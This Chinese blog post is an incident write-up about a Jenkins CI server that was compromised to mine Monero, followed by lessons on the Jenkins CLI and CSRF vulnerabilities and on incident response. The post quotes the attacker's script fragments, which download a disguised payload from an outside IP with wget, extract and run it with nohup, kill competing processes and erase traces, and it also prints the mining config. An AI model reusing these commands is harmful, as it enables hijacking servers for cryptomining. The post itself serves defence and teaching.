<!doctype html><html lang=zh class=dark><head>
<meta charset=utf-8>
<meta http-equiv=content-language content="zh">
<meta name=viewport content="width=device-width,initial-scale=1">
<meta http-equiv=x-ua-compatible content="ie=edge">
<title>你的 CI 在挖矿吗？ &#183; 顾宇的博客</title>
<meta name=title content="你的 CI 在挖矿吗？ &#183; 顾宇的博客">
<meta name=description content>
<link rel=canonical href=https://wwww.guyu.me/posts/2017-06-28-are-your-ci-mining/>
<link type=text/css rel=stylesheet href=/css/schemes/slate.min.1fa9cfe6ea431f51b6669ad59d531a840711f25edf67f90d0227253371e1da49fdcc25506150e39fb99ac2c95a6012b2c4bbdd6c41b841b186419cbd7e115768.css integrity="sha512-H6nP5upDH1G2ZprVnVMahAcR8l7fZ/kNAiclM3Hh2kn9zCVQYVDjn7mawslaYBKyxLvdbEG4QbGGQZy9fhFXaA==">
<link type=text/css rel=stylesheet href=/css/compiled/main.min.4076b9cf114dd23cca017f3365e2205a4c9a4b2c0ef4193ccd08883f76e554aa40f674a8f6e77a1b2895be0975ba8e019b0c59996c2eea32e4970ca4d5221653.css integrity="sha512-QHa5zxFN0jzKAX8zZeIgWkyaSywO9Bk8zQiIP3blVKpA9nSo9ud6GyiVvgl1uo4BmwxZmWwu6jLklwyk1SIWUw==">
<script>function loadPreferredAppearance(){localStorage.preferredAppearance==="dark"||!("preferredAppearance"in localStorage)&&window.matchMedia("(prefers-color-scheme: dark)").matches?document.documentElement.classList.add("dark"):document.documentElement.classList.remove("dark")}function setPreferredAppearance(a){a=="default"?localStorage.removeItem("preferredAppearance"):localStorage.preferredAppearance=a,loadPreferredAppearance()}loadPreferredAppearance(),window.matchMedia("(prefers-color-scheme: dark)").addListener(loadPreferredAppearance)</script>
<link rel=apple-touch-icon sizes=180x180 href=/apple-touch-icon.png>
<link rel=icon type=image/png sizes=32x32 href=/favicon-32x32.png>
<link rel=icon type=image/png sizes=16x16 href=/favicon-16x16.png>
<link rel=manifest href=/site.webmanifest>
<meta property="og:title" content="你的 CI 在挖矿吗？">
<meta property="og:description" content="我们的持续集成服务器搭建在AWS上的一个EC2的虚拟机中。采用 Jenkins 2.46.1 并且只有一个Master实例来运行所有的任务。且采用持续部署——团队每天要">
<meta property="og:type" content="article">
<meta property="og:url" content="https://wwww.guyu.me/posts/2017-06-28-are-your-ci-mining/"><meta property="article:section" content="posts">
<meta property="article:published_time" content="2017-06-28T00:00:00+00:00">
<meta property="article:modified_time" content="2017-06-28T00:00:00+00:00">
<meta name=twitter:card content="summary">
<meta name=twitter:title content="你的 CI 在挖矿吗？">
<meta name=twitter:description content="我们的持续集成服务器搭建在AWS上的一个EC2的虚拟机中。采用 Jenkins 2.46.1 并且只有一个Master实例来运行所有的任务。且采用持续部署——团队每天要">
<script type=application/ld+json>{"@context":"https://schema.org","@type":"BlogPosting","articleSection":"Posts","name":"你的 CI 在挖矿吗？","headline":"你的 CI 在挖矿吗？","description":"我们的持续集成服务器搭建在AWS上的一个EC2的虚拟机中。采用 Jenkins 2.46.1 并且只有一个Master实例来运行所有的任务。且采用持续部署——团队每天要","inLanguage":"zh","author":{"@type":"Person","name":"顾宇"},"creator":{"@type":"Person","name":"顾宇"},"copyrightHolder":"顾宇","copyrightYear":"2017","dateCreated":"2017-06-28T00:00:00\u002b00:00","datePublished":"2017-06-28T00:00:00\u002b00:00","dateModified":"2017-06-28T00:00:00\u002b00:00","url":"https:\/\/wwww.guyu.me\/posts\/2017-06-28-are-your-ci-mining\/","wordCount":"4597","keywords":["DevOps 文化"]}</script>
<meta name=generator content="Hugo 0.90.1">
<meta name=author content="顾宇">
<link href=https://linkedin.com/in/wizardbyron rel=me>
<link href=https://github.com/wizardbyron rel=me>
</head>
<body class="flex flex-col h-screen px-6 m-auto text-lg leading-7 bg-neutral text-neutral-900 sm:px-14 md:px-24 lg:px-32 dark:bg-neutral-800 dark:text-neutral max-w-7xl"><header class="flex justify-between py-6 font-semibold sm:items-center sm:py-10 text-neutral-800 dark:text-neutral">
<div>
<a class="hover:underline hover:underline-primary-500 hover:underline-thickness-bold hover:underline-offset-small" rel=me href=/>顾宇的博客</a>
</div>
<nav>
<ul class="flex flex-col list-none sm:flex-row">
<li class="mb-1 text-right sm:mb-0 sm:mr-7 sm:last:mr-0">
<a class="hover:underline hover:underline-primary-500 hover:underline-thickness-bold hover:underline-offset-small" href=/ title>主页</a>
</li>
<li class="mb-1 text-right sm:mb-0 sm:mr-7 sm:last:mr-0">
<a class="hover:underline hover:underline-primary-500 hover:underline-thickness-bold hover:underline-offset-small" href=/posts/ title=Posts>博客</a>
</li>
<li class="mb-1 text-right sm:mb-0 sm:mr-7 sm:last:mr-0">
<a class="hover:underline hover:underline-primary-500 hover:underline-thickness-bold hover:underline-offset-small" href=/categories/ title=Categories>分类</a>
</li>
<li class="mb-1 text-right sm:mb-0 sm:mr-7 sm:last:mr-0">
<a class="hover:underline hover:underline-primary-500 hover:underline-thickness-bold hover:underline-offset-small" href=/tags/ title=Tags>标签</a>
</li>
<li class="mb-1 text-right sm:mb-0 sm:mr-7 sm:last:mr-0">
<a class="hover:underline hover:underline-primary-500 hover:underline-thickness-bold hover:underline-offset-small" href=/guides title>实践指南</a>
</li>
<li class="mb-1 text-right sm:mb-0 sm:mr-7 sm:last:mr-0">
<a class="hover:underline hover:underline-primary-500 hover:underline-thickness-bold hover:underline-offset-small" href=/about/ title=关于我>关于我</a>
</li>
</ul>
</nav>
</header>
<main class=flex-grow>
<article class=max-w-prose>
<header>
<h1 class="mt-0 text-4xl font-extrabold text-neutral-800 dark:text-neutral">
你的 CI 在挖矿吗？
</h1>
<div class="mt-8 mb-12 text-base text-neutral-400 dark:text-neutral-500">
<div class="flex flex-row items-center">
<time datetime="2017-06-28 00:00:00 +0000 UTC">28 June 2017</time><span class="px-2 text-primary-500">&#183;</span><span>
4597字</span><span class="px-2 text-primary-500">&#183;</span><span title=预计阅读>10 分钟</span><span class="px-2 text-primary-500">&#183;</span>
<span class=mb-[2px]>
<a href=https://github.com/wizardbyron/wizardbyron.github.io/tree/main/content/posts/2017-06-28-are-your-ci-mining.md class="text-lg hover:text-primary-500" rel="noopener noreferrer" target=_blank title=编辑内容>
<span class="relative inline-block align-text-bottom icon"><svg aria-hidden="true" focusable="false" data-prefix="far" data-icon="edit" class="svg-inline--fa fa-edit fa-w-18" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512"><path fill="currentcolor" d="M402.3 344.9l32-32c5-5 13.7-1.5 13.7 5.7V464c0 26.5-21.5 48-48 48H48c-26.5.0-48-21.5-48-48V112c0-26.5 21.5-48 48-48h273.5c7.1.0 10.7 8.6 5.7 13.7l-32 32c-1.5 1.5-3.5 2.3-5.7 2.3H48v352h352V350.5c0-2.1.8-4.1 2.3-5.6zm156.6-201.8L296.3 405.7l-90.4 10c-26.2 2.9-48.5-19.2-45.6-45.6l10-90.4L432.9 17.1c22.9-22.9 59.9-22.9 82.7.0l43.2 43.2c22.9 22.9 22.9 60 .1 82.8zM460.1 174 402 115.9 216.2 301.8l-7.3 65.3 65.3-7.3L460.1 174zm64.8-79.7-43.2-43.2c-4.1-4.1-10.8-4.1-14.8.0L436 82l58.1 58.1 30.9-30.9c4-4.2 4-10.8-.1-14.9z"/></svg>
</span>
</a>
</span>
</div>
</div>
</header>
<section class="prose dark:prose-light">
<p>我们的持续集成服务器搭建在AWS上的一个EC2的虚拟机中。采用 Jenkins 2.46.1 并且只有一个Master实例来运行所有的任务。且采用持续部署——团队每天要在开发环境自动部署10+个版本。整个过程由Jenkins内部构建的流水线触发。代码提交，测试，构建，部署一气呵成。</p>
<p>我们有一个中心产品代码库，这个中心产品对应着不同国家的在线产品。分别是：新加坡，马来西亚，印度尼西亚和香港。为了安全起见，我们为每一个产品的环境单独部署了一套持续交付流水线。由于各地域产品的差异较小，我们采用同一套基础设施配置初始化Jenkins配置，因此，我们有四台差不多的持续交付流水线。</p>
<h2 id=从一次构建变慢的调查说起>从一次“构建变慢“的调查说起 <a class=heading-anchor href=#%e4%bb%8e%e4%b8%80%e6%ac%a1%e6%9e%84%e5%bb%ba%e5%8f%98%e6%85%a2%e7%9a%84%e8%b0%83%e6%9f%a5%e8%af%b4%e8%b5%b7 aria-label=锚点>#</a></h2>
<p>在周二的时候，突然有人发现”马来西亚“的部署流程开始变慢，其中构建过程从上周的的7分钟左右变成了44分钟。而同样的代码改动，其它国家的服务器并没有如此大的差异。</p>
<p><strong>那么问题一定在这个服务器上</strong>！</p>
<p>影响构建速度的因素主要是资源的占用导致的等待，这方面的资源包括：CPU、内存、磁盘和网络。</p>
<p>由于我们采用NewRelic对所有的持续集成服务器进行监控。所以可以得到CPU、内存、磁盘和网络的性能监控数据以及横向的对比信息。通过对比相关的数据，我们发现这一台服务器上有个在/tmp目录下运行的叫`donns`的陌生进程长期占用大量CPU，它的文件权限属于Jenkins用户以及Jenkins用户组。所以这个程序的执行是由Jenkins出发了。</p>
<p>我们在Jenkins的相关网站里搜索这个名为donns进程的相关信息，但一无所获。于是我们在/tmp目录中寻找和这个进程相关的信息，我们发现了一个陌生的Shell脚本，打开内容看，内容却让我们大跌眼镜。以下是几个重要的脚本片段：</p>
<p><strong>代码片段 1</strong>:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>pkill conns

ps auxw|head -1;ps auxw|sort -rn -k3|head -1|awk <span style=color:#e6db74>&#39;{if(\$3\&gt;80.0) print
</span><span style=color:#e6db74>&#34;kill -9 &#34; \$2}&#39;</span>|sh

pkill bonns
</code></pre></div><p>我们看到，这段代码杀死了占用CPU超过80%的进程。此外，杀死了名为conns和bonns的进程。</p>
<p>conns进程是什么？bonns进程又是什么？为什么要杀死CPU占用率超过80%的进程？</p>
<p><strong>代码片段 2</strong>:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>wget 91.235.143.129:8086/587b626883fdc.png -O /tmp/conn

wget 91.235.143.129:8086/1eac80002f.conf -O /tmp/config.conf
</code></pre></div><p>从91.235.143.129:8086下载了一个图片和一个配置文件。这个服务器是干嘛的？这个配置文件又包含了哪些内容？</p>
<p>通过在自己的沙盒环境里打开这个配置文件，发现它的内容是这样的：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-json data-lang=json>{
<span style=color:#f92672>&#34;url&#34;</span> : <span style=color:#e6db74>&#34;stratum+tcp://xmr.crypto-pool.fr:3333&#34;</span>,
<span style=color:#f92672>&#34;user&#34;</span> :
 <span style=color:#e6db74>&#34;43ZQzwdYHC9ebXxZhJuwkH5jvmfEBCEjkd1PvqxacrJaEDQFyNuxJhcib8MsJRgFnbATB6rpBEzq8EKqRqUbjyNy3opCS4k&#34;</span>,
<span style=color:#f92672>&#34;pass&#34;</span> : <span style=color:#e6db74>&#34;x&#34;</span>
}
</code></pre></div><p><strong>stratum+tcp</strong> 协议引发了我的好奇心，经过调查，这居然是一个叫做<strong>门罗币的加密虚拟币</strong>的<strong>矿池</strong>协议：</p>
<blockquote>
<p><strong>门罗币****XMR</strong>一种使用CryptoNote协议的一个虚拟币币种，其并不是比特币的一个分支。CryptoNote在2012年已经开发出来，当年已有Bytecoin使用CrytoNote技术，XMR是在2014年开发出来，可以预见CryptoNote技术已经非常成熟，该技术通过数字环签名提供更好的匿名性。目前国内对该币种匿名技术宣传较少，国外知名度较高。Monero词语是引自于世界语，在世界语中的含义表示为货币。</p>
<p>而<strong>矿池</strong>则是是比特币(Bitcoin)等P2P密码学虚拟货币开采所必须的基础设施，一般是对外开放的团队开采服务器，其存在意义为提升比特币开采稳定性，使矿工薪酬趋于稳定。</p>
<p>假设100万人参与比特币挖矿，全网400P算力，其中90%的矿工为1P(1000T)以下的算力，如果投入一台1T矿机，将占全网算力的40万分之1，理论上平均每40万个10分钟能挖到一个区块，也就是7.6年才能挖到一个区块然后一次性拿到50个比特币。那么，假如我再找9个拥有1T算力矿机的矿工，达成协定，我们总共10个人，其中任何一个人挖到区块，都按照每人的算力占比来进行平分，那么我们就是一个整体，总共10T算力，那么平均0.76年即可挖到一个区块，然后算下来到我们手上的就是0.76年开采到5个比特币，如果组织100人、1000人、1万人甚至10万人呢？如果是10万人，那么平均100分钟就能挖到1个区块，作为团队的一份子，我的收入将会趋于稳定。这就是矿池的基本原理，即大家组队进行比特币开采，可以参考彩票中的合买。</p>
</blockquote>
<p>当然，以上只是对矿池的基本原理和性质进行简单的描述，实际情况会非常复杂。矿池是一个全自动的开采平台，即矿机接入矿池——提供算力——获得收益。</p>
<p>抱着“大胆假设，小心求证”的心态，我们找到了配置文件中这家叫做crypyto-pool的网站<a href=https://monero.crypto-pool.fr/>https://monero.crypto-pool.fr/</a>它是一个著名门罗币的矿池网站。而通过配置文件的用户名，我们看到了这个程序的挖矿记录和转账记录。根据6月份的交易数据以及对应牌价，截止作者发稿时，该程序已 为作者赚取了 1165.64 美元的收益。</p>
<p>而接下来的代码间接暴露了证据：</p>
<p><strong>代码片段 3</strong>:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>dd <span style=color:#66d9ef>if</span><span style=color:#f92672>=</span>/tmp/conn skip<span style=color:#f92672>=</span><span style=color:#ae81ff>7664</span> bs<span style=color:#f92672>=</span><span style=color:#ae81ff>1</span> of<span style=color:#f92672>=</span>/tmp/donns

chmod +x /tmp/donns
nohup /tmp/donns -B -c /tmp/config.conf <span style=color:#ae81ff>\&gt;</span>/dev/null 2<span style=color:#ae81ff>\&gt;</span>&amp;<span style=color:#ae81ff>1</span> &amp;
rm -rf /tmp/config.conf
rm -rf /tmp/conn
rm -rf /tmp/conns
rm -f /tmp/bonn.sh
</code></pre></div><p>这段脚本不光执行了程序，并且删除了执行后的相关文件记录。确认了是挖矿进程之后，我们果断的停止了进程，并且把对应的环境制作成了临时镜像以便做进一步分析。</p>
<p>以上，我们仅仅通过一系列调查证明了 donns 进程具有挖门罗币的功能。然而，我们很难知道它是否做了别的事情。比如把 CI
上的关键信息发送出去，后果则不堪设想……</p>
<h2 id=那么问题来了这段脚本是如何进入ci的>那么问题来了，这段脚本是如何进入CI的 <a class=heading-anchor href=#%e9%82%a3%e4%b9%88%e9%97%ae%e9%a2%98%e6%9d%a5%e4%ba%86%e8%bf%99%e6%ae%b5%e8%84%9a%e6%9c%ac%e6%98%af%e5%a6%82%e4%bd%95%e8%bf%9b%e5%85%a5ci%e7%9a%84 aria-label=锚点>#</a></h2>
<p>通过网上搜索相关线索（<a href=https://groups.google.com/forum/#!topic/jenkinsci-advisories/sN9S0x78kMU>https://groups.google.com/forum/#!topic/jenkinsci-advisories/sN9S0x78kMU</a>），这个脚本最早是2016年11月11日发现的，最早是一个叫做kwwoker32的进程，脚本很相似。从脚本来看，经历了conns, bonns两代的演化之后，这应该是第三代挖矿脚本了。从脚本来看，donns和bonns和conns是竞争关系，因此执行之前要把它俩先强制终止并清除。它们所采用的应该是同一个漏洞。</p>
<p>这个漏洞存在于Jenkins CLI，这是一个用Java编写的命令行工具，可以通过命令行远程操作Jenkins来执行很多操作。在这个例子中，攻击者通过这个工具向Jenkins服务器传送一个序列化的对象连接到攻击者的LDAP服务器，以此绕过Jenkins自身保护机制并且远程执行代码。</p>
<p>修复方法是手动修改Jenkins的执行脚本，关闭CLI这个选项（默认是打开的）。</p>
<p>而在今年的4月26日，又修复了一大批通过 <strong>跨站请求伪造(Cross Site Request Forgery)远程执行代码的漏洞</strong>。</p>
<p><strong>跨站请求伪造（Cross-Site Request Forgery）</strong> 在OWASP Top 10 里排在 A8，是常见的攻击类型。CSRF攻击原理比较简单，如下图所示：</p>
<p><img src=/images/post/20170628/csrf.png alt=跨站请求伪造></p>
<h3 id=jenkins-的-跨站请求伪造csrf攻击>Jenkins 的 跨站请求伪造（CSRF）攻击 <a class=heading-anchor href=#jenkins-%e7%9a%84-%e8%b7%a8%e7%ab%99%e8%af%b7%e6%b1%82%e4%bc%aa%e9%80%a0csrf%e6%94%bb%e5%87%bb aria-label=锚点>#</a></h3>
<p>1.管理员打开浏览器，并输入用户名和密码请求登录Jenkins；</p>
<p>2.在用户信息通过验证后，Jenkins产生Cookie信息并返回给浏览器，此时管理员登录Jenkins成功，可以正常发送请求到Jenkins；</p>
<p>3.用户未退出Jenkins之前，在同一浏览器中，打开一个TAB页访问恶意网站；</p>
<p>4.在恶意网站接收到用户请求后，返回一些攻击性代码，并发出一个请求要求访问Jenkins；</p>
<p>5.浏览器在接收到这些攻击性代码后，根据存在恶意代码的网站的请求，在用户不知情的情况下携带Cookie信息，向Jenkins发出请求。Jenkins并不知道该请求其实是由恶意网站发起的，所以会根据用户的Cookie信息中的权限处理该请求，导致来自恶意网站的恶意代码被执行。</p>
<p><strong>简而言之，任何一个拥有 Jenkins 权限的管理员，如果在企业网络内部，同时访问 Jenkins 以及存在攻击脚本的第三方网页，攻击脚本就会伪造请求并利用漏洞进行攻击</strong>。</p>
<h3 id=当发现这样的事故时我们是怎么做的>当发现这样的事故时，我们是怎么做的 <a class=heading-anchor href=#%e5%bd%93%e5%8f%91%e7%8e%b0%e8%bf%99%e6%a0%b7%e7%9a%84%e4%ba%8b%e6%95%85%e6%97%b6%e6%88%91%e4%bb%ac%e6%98%af%e6%80%8e%e4%b9%88%e5%81%9a%e7%9a%84 aria-label=锚点>#</a></h3>
<p>处理运维事故就像在手术室抢救重症病患一样，最大对手除了问题本身，就是时间，要在最快的速度里减少损失，并且要留下足够的信息便于追查。</p>
<p>而在处理这次事故的时候，我们采取了如下措施：</p>
<ol>
<li>及时切断网络而不是终止程序，避免更多的泄露。也许你停止了进程的同时，进程也会销毁一切记录，不利于事后排查。</li>
<li>快速构建虚拟机镜像，保留现场。（这通常需要一些外部资源支持。如果你没有这个条件，保持服务器只有有限的网络访问权限。）</li>
<li>记录下整个发现的过程，最好能够通过终端软件实时截图。或者采用 script命令录制过程。</li>
<li>及时保留相关连的第三方系统的访问日志。</li>
<li>找出这台服务器上所有的 口令，秘钥等，并立即更换。</li>
<li>终端其它 CI 服务器的运作，并立即进行安全排查。</li>
<li>采用更严格的黑白名单，限制网络的访问，对应用的访问进行隔离。</li>
</ol>
<h2 id=通过这一次攻击我们学到了什么>通过这一次攻击，我们学到了什么 <a class=heading-anchor href=#%e9%80%9a%e8%bf%87%e8%bf%99%e4%b8%80%e6%ac%a1%e6%94%bb%e5%87%bb%e6%88%91%e4%bb%ac%e5%ad%a6%e5%88%b0%e4%ba%86%e4%bb%80%e4%b9%88 aria-label=锚点>#</a></h2>
<h3 id=本次攻击给运维人员的启示>本次攻击给运维人员的启示 <a class=heading-anchor href=#%e6%9c%ac%e6%ac%a1%e6%94%bb%e5%87%bb%e7%bb%99%e8%bf%90%e7%bb%b4%e4%ba%ba%e5%91%98%e7%9a%84%e5%90%af%e7%a4%ba aria-label=锚点>#</a></h3>
<p><strong>可执行（executeble）的东西往往都是安全隐患的重灾区，尤其是未经授权的执行</strong>。</p>
<p>浏览器是需要防范的第一关，因为浏览器会：1. 访问外部资源，2.自动执行来源不明的脚本。而这些脚本对用户来说是不透明的，这就为很多潜在的 <strong>跨站请求伪造</strong> 便利用了这样一个契机。因此，内外网络分离，限制可公开访问的内容，建立访问黑白名单制度，非常重要。如果持续集成服务器实现了内外网完全隔离，采用跳板机并限制
Jenkins 对外访问，这次的攻击完全可以避免。</p>
<p>在<a href=/posts/2017-02-14-core-devops-concepts>避免CI成为一个安全隐患</a>一文中，由于 CI 具有自动执行任务的能力。因此，它会成为一个重大的安全隐患。而这次事件恰恰 又验证了“漏洞墨菲定律”：只要漏洞有可能被利用，则一定会被利用。</p>
<p>Jenkins是一款开源软件，代码对公众的开放，同时也把漏洞开放给了所有人。因此，需要对开源软件进行更加严格的安全控制和监控，而不能因噎废食，彻底抛弃开源软件，走向另一个极端。</p>
<h3 id=那么如何安全的使用开源软件>那么，如何安全的使用开源软件 <a class=heading-anchor href=#%e9%82%a3%e4%b9%88%e5%a6%82%e4%bd%95%e5%ae%89%e5%85%a8%e7%9a%84%e4%bd%bf%e7%94%a8%e5%bc%80%e6%ba%90%e8%bd%af%e4%bb%b6 aria-label=锚点>#</a></h3>
<ol>
<li>
<p>来源可靠：软件包来源应当可靠，最好能通过 MD5 Sum 校验。</p>
</li>
<li>
<p>权限受限：在受限的权限和隔离区下使用软件。</p>
</li>
<li>
<p>执行可控：运行环境或者网络隔，使之运行在沙箱里，降低影响范围。</p>
</li>
<li>
<p>无状态化：定期销毁运行实例，并且进行重启，更新访问权限信息，例如密码或
token，避免权限滥用。</p>
</li>
</ol>
<p>在 DevOps 的实践中，往往会通过自动化执行一些任务带来便利。然而，易用性和安全性往往很难兼得，在自动化的过程中，一定要考虑到其中可能产生安全隐患并且最大程度的限制可执行资源的访问。</p>
<h2 id=本次攻击给-开发人员的启示>本次攻击给 开发人员的启示 <a class=heading-anchor href=#%e6%9c%ac%e6%ac%a1%e6%94%bb%e5%87%bb%e7%bb%99-%e5%bc%80%e5%8f%91%e4%ba%ba%e5%91%98%e7%9a%84%e5%90%af%e7%a4%ba aria-label=锚点>#</a></h2>
<p><strong>跨站请求伪造</strong>是很常见的安全漏洞，对于 Web 应用开发人员而言，往往会因为某些便利性的设计给站点带来隐患。尤其是 REST API的设计，如果没有添加对应的权限验证，往往会成为跨站请求伪造的目标。虽然多一步验证会影响用户体验，但安全仍然是不能够 Trade-Off 的内容之一。不要为了采取便利的方案留下了很深的安全隐患。创建漏洞往往来源于不小心，而找到漏洞则需要花费更大的周折。采用一些通用的安全实践，往往会得到更好的效果。</p>
<p>关于更多的跨站请求伪造如何防御的信息请参考：</p>
<p><a href=https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)>Top 10 2013-A8-Cross-Site Request Forgery (CSRF) -OWASP</a></p>
<p><a href=http://www.freebuf.com/articles/web/11840.html>[科普]跨站请求伪造-CSRF防护方法 - FreeBuf.COM |关注黑客与极客</a></p>
<p>此外，通过对象传递，利用 Java 接口的特性，攻击者可以自由改写方法的实现。从而达到远程执行代码的目的，Jenkins CLI 的漏洞就来源于此，在代码设计时如果缺乏足够的验证和异常捕获，攻击代码就可以通过异常绕过验证并直接执行。<strong>因此，传递对象如果包含可执行的内容，一定要非常小心。如果要传递序列化的对象，在反序列化的时候一定要进行足够的验证</strong>。</p>
<h2 id=还是那句话如果没有这些如果>还是那句话，如果没有这些如果 <a class=heading-anchor href=#%e8%bf%98%e6%98%af%e9%82%a3%e5%8f%a5%e8%af%9d%e5%a6%82%e6%9e%9c%e6%b2%a1%e6%9c%89%e8%bf%99%e4%ba%9b%e5%a6%82%e6%9e%9c aria-label=锚点>#</a></h2>
<p>攻击者的手段是层出不穷的，因此安全不单单是运维或是开发的问题，它是一个问题体系。DevOps 团队一定要有安全內建（<a href=http://www.buildsecurityin.cn/zh/>Build Security In</a>）的意识。从工作流程，安全实践和安全仪式上进行全方位的评估和学习，请不要把安全当做是阻碍，它是保护你和大家的最好手段。</p>
</section>
<footer class=pt-8>
<div class=flex>
<img class="w-24 h-24 !mt-0 !mb-0 mr-4 rounded-full" src=/img/author.jpg>
<div class=place-self-center>
<div class="text-[0.6rem] leading-3 text-neutral-400 dark:text-neutral-500 uppercase">
作者
</div>
<div class="font-semibold leading-6 text-neutral-800 dark:text-neutral-300">
顾宇
</div>
<div class="text-sm text-neutral-700 dark:text-neutral-400">Stand Alone CompleX</div>
<div class="flex flex-wrap text-neutral-400 dark:text-neutral-500">
<a class="px-1 hover:text-primary-700 dark:hover:text-primary-400" href=https://linkedin.com/in/wizardbyron target=_blank alt=Linkedin rel="me noopener noreferrer">
<span class="relative inline-block align-text-bottom icon"><svg aria-hidden="true" focusable="false" data-prefix="fab" data-icon="linkedin" class="svg-inline--fa fa-linkedin fa-w-14" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><path fill="currentcolor" d="M416 32H31.9C14.3 32 0 46.5.0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6.0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3.0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2.0 38.5 17.3 38.5 38.5.0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7-34.6.0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5 67.2.0 79.7 44.3 79.7 101.9V416z"/></svg>
</span>
</a>
<a class="px-1 hover:text-primary-700 dark:hover:text-primary-400" href=https://github.com/wizardbyron target=_blank alt=Github rel="me noopener noreferrer">
<span class="relative inline-block align-text-bottom icon"><svg aria-hidden="true" focusable="false" data-prefix="fab" data-icon="github" class="svg-inline--fa fa-github fa-w-16" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><path fill="currentcolor" d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6.0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6.0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3.0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1.0-6.2-.3-40.4-.3-61.4.0.0-70 15-84.7-29.8.0.0-11.4-29.1-27.8-36.6.0.0-22.9-15.7 1.6-15.4.0.0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5.0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9.0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4.0 33.7-.3 75.4-.3 83.6.0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6.0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9.0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
</span>
</a>
</div>
</div>
</div>
<div class="pt-8 article-pagination">
<hr class="border-dotted border-neutral-300 dark:border-neutral-600">
<div class="flex justify-between pt-3">
<span>
<a class=flex href=/posts/2017-08-16-seven-steps-to-start-your-microservices-project/>
<span class="mr-3 article-pagination-direction">&larr;</span>
<span class="flex flex-col">
<span class="article-pagination-title mt-[0.1rem] leading-6">提升微服务实施效率的 7 个步骤</span>
<span class="mt-[0.1rem] text-xs text-neutral-400 dark:text-neutral-500">
<time datetime="2017-08-16 00:00:00 +0000 UTC">16 August 2017</time>
</span>
</span>
</a>
</span>
<span>
<a class="flex text-right" href=/posts/2017-05-21-devops-culture/>
<span class="flex flex-col">
<span class="article-pagination-title mt-[0.1rem] leading-6">DevOps前世今生 - DevOps 的文化</span>
<span class="mt-[0.1rem] text-xs text-neutral-400 dark:text-neutral-500">
<time datetime="2017-05-21 00:00:00 +0000 UTC">21 May 2017</time>
</span>
</span>
<span class="ml-3 article-pagination-direction">&rarr;</span>
</a>
</span>
</div>
</div>
</footer>
</article>
</main><footer class=py-10>
<div class="flex justify-between">
<div>
<p class="text-sm text-neutral-400 dark:text-neutral-500">
&copy;
2021
顾宇
</p>
<p class="text-xs text-neutral-300 dark:text-neutral-600">
由 <a class="hover:underline hover:underline-primary-300 hover:text-primary-400" href=https://gohugo.io/ target=_blank rel="noopener noreferrer">Hugo</a> & <a class="hover:underline hover:underline-primary-300 hover:text-primary-400" href=https://git.io/hugo-congo target=_blank rel="noopener noreferrer">Congo</a> 强力驱动
</p>
</div>
<div class="text-sm cursor-pointer text-neutral-400 dark:text-neutral-500">
<button id=dark-toggle onclick="setPreferredAppearance('dark')" oncontextmenu="return setPreferredAppearance('default'),!1" class="inline px-2 py-1 border rounded-md border-neutral-200 dark:hidden hover:text-primary-500 hover:border-primary-400" title=切换为深色模式>
